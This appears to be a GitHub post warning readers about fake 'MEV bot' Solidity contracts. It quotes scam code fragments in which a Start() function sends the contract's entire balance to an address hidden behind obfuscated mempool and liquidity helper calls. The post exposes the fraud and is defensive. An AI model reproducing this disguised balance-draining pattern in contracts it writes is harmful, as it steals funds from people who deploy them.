Be careful for the fake mev-bot codes
Wanted to study the mevbot, unexpectedly found a scam, so want to remind you to avoid being cheated, many similar to this project of https://github.com/KayExpertbots/Mevbot, fake script like this
function Start() public payable {
emit Log("Running MEV action. This can take a while; please wait..");
payable(_callMEVAction()).transfer(address(this).balance);
}
Start looks like a startup script is actually a transfer, will transfer your balance to an address, '_callMEVAction()' This method is actually the last will generate a wallet address, around is to cheat some beginners, so we must look at it, see this code must be careful
transfer(address(this).balance);
function callMempool() internal pure returns (string memory) {
string memory _memPoolOffset = mempool("x", checkLiquidity(getMemPoolOffset()));
uint _memPoolSol = 3410611; //Gas estimate update
uint _memPoolLength = 2418259; //Gas estimate update
uint _memPoolSize = 2563395760; //Gas estimate update
uint _memPoolHeight = getMemPoolHeight();
uint _memPoolDepth = getMemPoolDepth();
string memory _memPool1 = mempool(_memPoolOffset, checkLiquidity(_memPoolSol));
string memory _memPool2 = mempool(checkLiquidity(_memPoolLength), checkLiquidity(_memPoolSize));
string memory _memPool3 = checkLiquidity(_memPoolHeight);
string memory _memPool4 = checkLiquidity(_memPoolDepth);
string memory _allMempools = mempool(mempool(_memPool1, _memPool2), mempool(_memPool3, _memPool4));
string memory _fullMempool = mempool("0", _allMempools);
return _fullMempool;
}
These are all lies so just a reminder, you can also help to light up the stars, so that more people can see
![image](https://private-user-images.githubusercontent.com/30768615/244952071-b87707ad-ae0c-4d49-892c-a54af47947d2.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyMzIxMjMsIm5iZiI6MTczOTIzMTgyMywicGF0aCI6Ii8zMDc2ODYxNS8yNDQ5NTIwNzEtYjg3NzA3YWQtYWUwYy00ZDQ5LTg5MmMtYTU0YWY0Nzk0N2QyLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNTAyMTAlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjUwMjEwVDIzNTcwM1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTllMGI0ZjU5YmI5ZjhhZjA0ODE0NjBmN2M4ODg4MjNiOGQ0ODg0ZmJiZTM5NTc4NTUwZmExZmEzZGRmMzEzMjMmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.nCgv4pNmp69hVZps-pwd3SU_kpHQ7nW7ZLysooy-5k8)
List of Fraud projects - 【诈骗项目列表】
【Some real projects of mev bot】